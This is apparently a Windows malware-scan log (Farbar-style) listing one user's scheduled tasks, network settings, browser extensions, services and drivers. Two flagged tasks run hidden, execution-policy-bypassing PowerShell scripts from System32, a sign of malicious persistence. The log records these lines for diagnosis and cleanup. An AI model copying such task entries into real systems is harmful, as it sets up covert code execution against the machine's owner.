Task: {00AAE17D-5854-4922-8396-86326F51A6D2} - System32\Tasks\update-S-1-5-21-3110588475-2115266248-3539613761-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (No File)
Task: {07B2C277-B2F3-4518-AC45-813D211DE09E} - System32\Tasks\CCleanerCrashReporting => C:\Program Files\CCleaner\CCleanerBugReport.exe [4669264 2022-10-20] (PIRIFORM SOFTWARE LIMITED -> Piriform Software) -> --product 90 --send dumps|report --path "C:\Program Files\CCleaner\LOG" --programpath "C:\Program Files\CCleaner" --configpath "C:\Program Files\CCleaner\Setup" --guid "4995a14b-6ac3-42f4-81c8-496d95a5dd1a" --version "6.05.10110" --silent
Task: {0CCE62CC-DD5A-4AD4-96F0-6A26802D4A53} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpCmdRun.exe [1567336 2022-11-01] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {4FF921FB-F882-448B-A433-CCC3A563DCB5} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [649784 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {52510CA0-CD65-48FC-99C5-CF57314CEC65} - \Microsoft\Windows\Management\Provisioning\xiHM0g\046E4CE2-D25A-4B57-A2E2-3AD7D55DFBDB -> No File <==== ATTENTION
Task: {5FDD0220-E4B9-4462-AC20-4D9BDB16070E} - System32\Tasks\Microsoft\Windows\Management\Provisioning\User => powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\WINDOWS\System32\57540306-c3ad-454f-bbe7-1c56160757fe.ps1" <==== ATTENTION
Task: {6A7B9D49-E5BF-4199-8990-7D182ADBB306} - System32\Tasks\GoogleUpdateTaskMachineCore{07D74F8D-CE32-4182-A77B-CF36AB803647} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-09-26] (Google LLC -> Google LLC)
Task: {759CFE0A-3FD2-4DDC-88ED-03B512AA677A} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [26154960 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {7704A820-CACF-4338-A77F-B5C190ADE09E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpCmdRun.exe [1567336 2022-11-01] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {8A790555-880A-4BCD-89E3-C48221871A6B} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [908856 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {8C08485A-D3A1-428D-B46B-7418CCFE0528} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655864 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {90412B12-C449-4E08-8793-C4A048C9414D} - System32\Tasks\CCleanerSkipUAC - Woytman => C:\Program Files\CCleaner\CCleaner.exe [32472400 2022-10-20] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd)
Task: {96BB2A72-BBD3-4A21-B7F2-C23A745E8678} - System32\Tasks\Microsoft\Windows\MUI\LPRemovea93Lqu => powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\D5910F34-9B2F-4E01-80CF-49460B7AF191.ps1" <==== ATTENTION
Task: {9DCE65F7-945F-4A44-9583-A631CB7C8A0B} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [684976 2022-10-20] (Piriform Software Ltd -> Piriform)
Task: {A206CE14-2270-46F0-A5FC-4289B1D96F0E} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [8576000 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {A4C668D0-8AD0-45AF-BDA6-1B7075D167AD} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655864 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {ADC88314-0FAD-42E4-BB17-E9B7279ED5FD} - System32\Tasks\Microsoft\Office\Office Performance Monitor => C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\operfmon.exe [66936 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {B2121AC3-64D0-4926-80EF-D656AC873F89} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655864 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {B2F82E57-5A82-46F4-88DC-C41367AF04D9} - System32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-09-26] (Google LLC -> Google LLC)
Task: {B56CF85C-13CE-4251-98B8-7B20E0F28E48} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655864 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {BB33B0D9-DD95-40F5-879B-665D56EEEE4F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpCmdRun.exe [1567336 2022-11-01] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C84F27BD-C0A4-4A2B-B7D2-B776E78D1B5D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [8576000 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (No File)
Task: {D33291ED-EBB4-4E46-8BD2-70CB7F3457EE} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-08-30] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {D7AFD09A-07CA-4136-926C-CB0629F7DF98} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [908856 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {DD5C7A52-7A1A-49D5-A684-E588487C21E1} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [144312 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {DF86D5F7-3565-4940-8A0C-69614DA27496} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342376 2022-10-17] (Nvidia Corporation -> NVIDIA Corporation)
Task: {E477AEF4-01F5-4174-853E-C49C3F5874D9} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [26154960 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {E71ACF64-B9AB-4B09-AA8D-9E6DF8ED4FEE} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpCmdRun.exe [1567336 2022-11-01] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F3ED570E-C6D2-4C9E-964E-E3430B16320F} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (No File)
Task: {F6F93A62-2B96-4E59-95B6-66F954B43D24} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [144312 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CCleanerCrashReporting.job => C:\Program Files\CCleaner\CCleanerBugReport.exe
Task: C:\WINDOWS\Tasks\update-S-1-5-21-3110588475-2115266248-3539613761-1001.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\WINDOWS\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog9 17 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9 18 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog9-x64 17 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9-x64 18 %windir%\system32\vsocklib.dll => No File
Tcpip\Parameters: [DhcpNameServer] 192.168.10.1 0.0.0.0
Tcpip\..\Interfaces\{07759c78-08b7-499b-9e76-9b1429355859}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{2809612c-d134-4c83-9a3f-32c34183507c}: [DhcpNameServer] 192.168.10.1 0.0.0.0
Tcpip\..\Interfaces\{2e4c83d7-15f2-48d4-8ad7-5fd397c1eb13}: [DhcpNameServer] 192.168.10.1 0.0.0.0
Tcpip\..\Interfaces\{41390136-14d9-4ad4-b140-a0d1b94d90a2}: [DhcpNameServer] 192.168.0.254
Tcpip\..\Interfaces\{91f1ad30-beeb-4fbf-885e-1e6e9d6a8c76}: [DhcpNameServer] 192.168.10.1 0.0.0.0
Tcpip\..\Interfaces\{bcbdebf0-34e1-4d08-879c-a923554a03f8}: [DhcpNameServer] 192.168.10.1 0.0.0.0
Tcpip\..\Interfaces\{e34a0e74-b114-4d52-943c-b674323e6033}: [DhcpNameServer] 192.168.10.1 0.0.0.0
Tcpip\..\Interfaces\{f40d0ce8-acff-40fe-a1fd-500b8f330d09}: [DhcpNameServer] 192.168.10.1 0.0.0.0

Edge:
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default [2022-11-05]
Edge HomePage: Default -> hxxp://www.google.com/
Edge Extension: (7TV) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ammjkodgmmoknidbanneddgankgfejfh [2022-08-18]
Edge Extension: (LastPass: Free Password Manager) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bbcinlkgjjkejfdpemiealijmmooekmp [2022-10-23]
Edge Extension: (DuckDuckGo) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\caoacbimdbbljakfhgikoodekdnlcgpk [2022-11-04]
Edge Extension: (minerBlock) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\emikbbbebcdfohonlaifafnoanocnebl [2022-10-19]
Edge Extension: (FrankerFaceZ) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fadndhdgpmmaapbmfcknlfgcflmmmieb [2022-07-11]
Edge Extension: (Return YouTube Dislike) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\gebbhagfogifgggkldgodflihgfeippi [2022-10-19]
Edge Extension: (Microsoft Editor: kontrola pravopisu a gramatiky) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hokifickgkhplphjiodbggjmoafhignh [2022-10-31]
Edge Extension: (BetterTTV) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\icllegkipkooaicfmdfaloehobmglglb [2022-10-19]
Edge Extension: (Dark Reader) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ifoakfbpdcdoeenechcleahebpibofpc [2022-10-19]
Edge Extension: (Gladiatus nBot) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\npfihoncaeggchfpldnmodmdajngpjib [2022-02-23]
Edge Extension: (I don't care about cookies) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\oholpbloipjbbhlhohaebmieiiieioal [2022-10-31]
Edge Extension: (Blokátor reklam AdGuard) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\pdffkfellgipmhklpdmokmckkkfcopbh [2022-10-31]
Edge Extension: (Google Sheets) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extension\rcefqbaerclldjeikmcnmojdknirlfai\2.4.2._0 [2022-07-14]

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=11.331.2 -> C:\Program Files\Java\jre1.8.0_331\bin\dtplugin\npDeployJava1.dll [2022-06-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.331.2 -> C:\Program Files\Java\jre1.8.0_331\bin\plugin2\npjp2.dll [2022-06-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.11 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.12 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.16 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=3.0.16 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2021-02-15] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Profile 2
CHR Profile: C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Default [2022-11-05]
CHR DefaultSearchURL: Default -> hxxps://duckduckgo.com/?q={searchTerms}
CHR DefaultSearchKeyword: Default -> duckduckgo.com
CHR DefaultNewTabURL: Default -> hxxps://duckduckgo.com/chrome_newtab
CHR DefaultSuggestURL: Default -> hxxps://duckduckgo.com/ac/?q={searchTerms}&type=list
CHR Extension: (Blokátor reklam AdGuard) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Default\Extensions\bgnkhhnnamicmpeenaelnjfhikgbkllg [2022-06-23]
CHR Extension: (DuckDuckGo) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkdgflcldnnnapblkhphbgpggdiikppg [2022-06-27]
CHR Extension: (Dark Reader) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Default\Extensions\eimadpbcbfnmbkopoojfekhnkhdbieeh [2022-06-23]
CHR Extension: (I don't care about cookies) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Default\Extensions\fihnjjcciajhdojfnbdddfaoknhalnja [2022-06-23]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2022-06-23]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2022-01-05]
CHR Profile: C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Guest Profile [2022-06-10]
CHR Profile: C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2 [2022-11-07]
CHR Notifications: Profile 2 -> hxxps://app.smartsupp.com; hxxps://aukro.cz
CHR HomePage: Profile 2 -> hxxp://www.google.com/
CHR StartupUrls: Profile 2 -> "hxxps://www.google.com/","hxxp://www.google.com","hxxp://home.torchbrowser.com/?systemid=448&appid=107&ua=Torch","hxxp://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.duckduckgo.com"
CHR Extension: (Just Black) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aghfnjkcakhmadgdomlmlhhaocbkloab [2022-01-22]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2022-08-30]
CHR Extension: (buykers | slevové kupony a kódy) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\dacdinoicboceafielngnmjjplncljhj [2022-10-26]
CHR Extension: (Return YouTube Dislike) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\gebbhagfogifgggkldgodflihgfeippi [2022-09-23]
CHR Extension: (Dokumenty Google offline) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-11-01]
CHR Extension: (SponsorBlock pro YouTube - Přeskoč sponzorství) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\mnjggcdmjocbbbhaepdhchncahnbgone [2022-11-07]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2022-01-22]
CHR Profile: C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3 [2022-11-05]
CHR HomePage: Profile 3 -> hxxp://www.google.com/
CHR StartupUrls: Profile 3 -> "hxxps://www.google.com/","hxxp://www.google.com","hxxp://home.torchbrowser.com/?systemid=448&appid=107&ua=Torch","hxxp://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.duckduckgo.com"
CHR Extension: (Ekvalizér pro Chrome browser) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\abikfbojmghmfjdjlbagiamkinbmbaic [2022-05-25]
CHR Extension: (Safe Torrent Scanner) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb [2022-08-15]
CHR Extension: (IBM Security Rapport) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\bbjllphbppobebmjpjcijfbakobcheof [2022-05-25]
CHR Extension: (Blokátor reklam AdGuard) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\bgnkhhnnamicmpeenaelnjfhikgbkllg [2022-05-25]

[autoprd]

CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2022-08-15]
CHR Extension: (Return YouTube Dislike) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\gebbhagfogifgggkldgodflihgfeippi [2022-08-15]
CHR Extension: (Dokumenty Google offline) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-08-15]
CHR Extension: (Malwarebytes Browser Guard) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ihcjicgdanjaechkgeegckofjjedodee [2022-08-15]
CHR Extension: (Excel Online) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\iljnkagajgfdmfnnidjijobijlfjfgnb [2022-05-25]
CHR Extension: (CrossPilot) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\migomhggnppjdijnfkiimcpjgnhmnale [2022-05-25]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2022-05-25]
CHR Extension: (Slinky Glamour) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\phcgjdgneipghoeikoeenifpknfkjpil [2022-05-25]
CHR Profile: C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\System Profile [2022-11-05]
CHR HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Adguard Service; C:\Program Files (x86)\Adguard\AdguardSvc.exe [467928 2022-03-05] (Adguard Software Limited -> Adguard Software Ltd)
S4 CCleanerPerformanceOptimizerService; C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe [1185616 2022-10-20] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [12516280 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
S3 dcsvc; C:\WINDOWS\system32\dcsvc.dll [831488 2022-09-06] (Microsoft Windows -> Microsoft Corporation)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [934352 2022-07-11] (Epic Games Inc. -> Epic Games, Inc.)
S3 GalaxyClientService; C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe [2131432 2022-10-11] (GOG Sp. z o.o. -> GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [7166552 2022-10-11] (GOG Sp. z o.o. -> GOG.com)
R2 Micro Star SCM; C:\WINDOWS\SysWOW64\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [File not signed]
S3 MSI Foundation Service; C:\Program Files (x86)\MSI\Dragon Center\MSIAPP_Service\MSIAPService.exe [47568 2018-10-29] (Micro-Star International CO., LTD. -> Micro-Star International Co., Ltd.)
R2 nlsvc; C:\Program Files\Locktime Software\NetLimiter 4\NLSvc.exe [22872 2022-10-02] (Locktime Software s.r.o. -> Locktime Software)
R2 Razer Chroma SDK Server; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKServer.exe [2032040 2022-09-27] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [480176 2022-09-19] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Chroma Stream Server; C:\Program Files (x86)\Razer Chroma SDK\bin\RzChromaStreamServer.exe [1354232 2022-06-15] (Razer USA Ltd. -> Razer Inc.)
R3 Razer Game Manager Service; C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe [254224 2021-11-16] (Razer USA Ltd. -> Razer Inc)
R2 Razer Synapse Service; C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.exe [300552 2022-10-05] (Razer USA Ltd. -> Razer Inc.)
S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [2720088 2022-11-02] (Rockstar Games, Inc. -> Rockstar Games)
R2 RzActionSvc; C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe [537912 2022-08-12] (Razer USA Ltd. -> Razer Inc.)
S3 Sendevsvc; C:\Program Files (x86)\MSI\Dragon Center\Sendevsvc\Sendevsvc.exe [302888 2019-01-30] (Micro-Star International CO., LTD. -> ) [File not signed]
R2 THXService; C:\Program Files (x86)\Razer\THXService\Drivers\x64\THXService.exe [356312 2019-09-18] (Razer USA Ltd. -> THX)
S3 tmInstall; C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.EXE [142856 2021-11-19] (Microsoft Windows Hardware Compatibility Publisher -> Thrustmaster®)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\NisSrv.exe [3191224 2022-11-01] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MsMpEng.exe [133536 2022-11-01] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 Browser; %SystemRoot%\System32\browser.dll [X]
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_3c492dde906d8149\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_3c492dde906d8149\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 adgnetworkwfpdrv; C:\WINDOWS\System32\drivers\adgnetworkwfpdrv.sys [98840 2021-11-02] (Microsoft Windows Hardware Compatibility Publisher -> Adguard Software Ltd)
S3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [42256 2019-11-22] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [59360 2019-11-22] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 ew_usbccgpfilter; C:\WINDOWS\System32\drivers\ew_usbccgpfilter.sys [18944 2020-06-29] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
S3 logi_joy_bus_enum; C:\WINDOWS\system32\drivers\logi_joy_bus_enum.sys [33528 2022-03-22] (WDKTestCert builder,132743893872553407 -> Logitech)
S3 logi_joy_vir_hid; C:\WINDOWS\system32\drivers\logi_joy_vir_hid.sys [21704 2022-03-22] (WDKTestCert builder,132743893872553407 -> Logitech)
S3 logi_joy_xlcore; C:\WINDOWS\system32\drivers\logi_joy_xlcore.sys [62904 2022-03-22] (WDKTestCert builder,132743893872553407 -> Logitech)
S3 MpKsla53bd8d0; C:\WINDOWS\system32\MpEngineStore\MpKslDrv.sys [228632 2022-11-07] (Microsoft Windows -> Microsoft Corporation)
R1 MSIO; C:\WINDOWS\system32\drivers\MsIo64.sys [17424 2020-01-19] (Microsoft Windows Hardware Compatibility Publisher -> MICSYS Technology Co., LTd)
R0 nldrv; C:\WINDOWS\System32\drivers\nldrv.sys [182312 2022-10-02] (Microsoft Windows Hardware Compatibility Publisher -> Locktime Software)
R3 NvModuleTracker; C:\WINDOWS\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_0c1cc60a4b422185\NvModuleTracker.sys [45656 2022-07-14] (Nvidia Corporation -> NVIDIA Corporation)
S0 RapportHades64; C:\WINDOWS\System32\Drivers\RapportHades64.sys [398984 2020-08-18] (IBM -> IBM Corp.)
S0 RapportKE64; C:\WINDOWS\System32\Drivers\RapportKE64.sys [448904 2020-08-18] (IBM -> IBM Corp.)
S3 Revoflt; C:\WINDOWS\System32\DRIVERS\revoflt.sys [38400 2021-11-17] (Microsoft Windows Hardware Compatibility Publisher -> VS Revo Group)
S3 RT-USB; C:\WINDOWS\system32\drivers\RT-USB64.SYS [97152 2014-05-12] (Ross-Tech, LLC -> Ross-Tech LLC)
R3 rt68cx21; C:\WINDOWS\System32\DriverStore\FileRepository\rt68cx21x64.inf_amd64_9e453ab47cf9cf42\rt68cx21x64.sys [652264 2022-07-23] (Realtek Semiconductor Corp. -> Realtek)
